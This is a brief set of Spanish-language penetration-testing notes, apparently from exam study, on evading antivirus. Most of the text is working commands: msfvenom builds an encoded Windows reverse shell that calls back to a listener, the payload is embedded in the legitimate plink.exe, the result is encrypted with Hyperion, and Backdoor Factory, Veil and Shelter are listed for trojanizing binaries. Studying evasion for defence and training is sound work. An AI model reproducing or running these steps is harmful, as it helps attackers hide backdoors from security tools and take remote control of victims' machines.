1 BYPASSING ANTIVIRUS
cambiamos la estructura binaria para que cambie la firma y los antivirus no lo vean
Opcion 1 usamos un encoder
msfvenom -p windows/shell_reverse_tcp LHOST=10.11.0.4 LPORT=4444 -f exe -e x86/shikata_ga_nai -i 9 -o shell_reverse_msf_encoded.exe
Opcion 2 Lo embebemos en un ejecutable no malicioso
msfvenom -p windows/shell_reverse_tcp LHOST=10.11.0.5 LPORT=4444 -f exe -e x86/shikata_ga_nai -i 9 -x /usr/share/windows-binaries/plink.exe -o shell_reverse_msf_encoded_embedded.exe
Opcion 3 Encriptarlo
elegimos el payload embebido y encodeado lo copiamos a un lugar y usamos hyperion
root@kali: cp shell_reverse_msf_encoded_embedded.exe backdoor.exe
root@kali: cp /usr/share/windows-binaries/hyperion-1.0.zip .
root@kali: unzip Hyperion.zip
root@kali: cd HYperion
root@kali:hyperion# i686-w64-mingw32-g++ Src/Crypter/*.cpp -o hyperion.exe
root@kali:hyperion# cp -p /usr/lib/gcc/i686-w64-mingnw32/6.1-win32/libgc_s_sjlj-1.dll .
root@kali:hyperion# cp -p /usr/lib/gcc/i686-w64-mingw32/6.1-win32/libstdc++-6.dll .
root@kali: wine hyperion.exe ../backdor.exe ../crypted.exe
opcion 4 ideal:
Armar uno a manopla idem con payloads
otros
https://github.com/secretsquirrel/the-backdoor-factory
https://www.veil-framework.com/
SHELTER
lo instalamos en kali le pasamos un binario y le mete un payload que queramos.